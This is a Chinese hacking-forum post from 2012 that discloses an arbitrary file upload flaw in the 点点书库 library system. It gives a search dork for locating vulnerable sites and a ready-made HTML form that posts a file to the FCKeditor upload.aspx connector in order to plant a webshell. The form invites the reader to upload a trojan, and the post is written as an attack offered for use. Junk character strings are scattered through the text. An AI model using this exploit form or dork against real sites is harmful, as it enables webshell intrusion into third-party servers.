主题:图书馆系统任意文件上传漏洞* e; N/ |5 @5 `- c! V l9 O- g
作者:冰锋刺客/ R* o! C+ D3 a3 m7 w" ^% Q
厂商:点击书(dianjishu.com): w8 A% F" K0 R. [9 U( m& z
日期:2012-6-21
1 r5 n5 H* o; @# u( n1 f; S ) _; [) R3 E- d5 ^9 @
I 概述' c- a4 S1 `( P9 I
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell1 ?4 [2 T1 C' B# U! Z* u6 }0 Q
II 简介* H9 n2 w# n) T$ Q$ N& d/ f
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
9 H& h( V; N* i7 m s3 ? 补充一个漏洞% n# n2 U6 j! ? A
<form id="frmUpload" enctype="multipart/form-data"
! q+ u0 |+ N6 e& w action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
% i4 i, _5 Y- R) G/ P <input id="btnUpload" type="submit" value="操翻他">' N+ _. b* v) Q" s1 W
</form>5 u* b/ ~3 x- v) y8 x
你们懂的
! F6 ]" q+ D: r& J2 |7 \ 那傻逼提供还需要改包.
, E" Z. S3 X- R/ M7 z5 A& v& ]* Y4 n 自己看了下源代码发现fckeditor
4 s2 U5 t3 |0 [1 [6 u" z 直接秒杀. H2 k4 o! j1 O) j( u( [' t
|
发表于 2012-9-10 21:20:59
收藏
支持
反对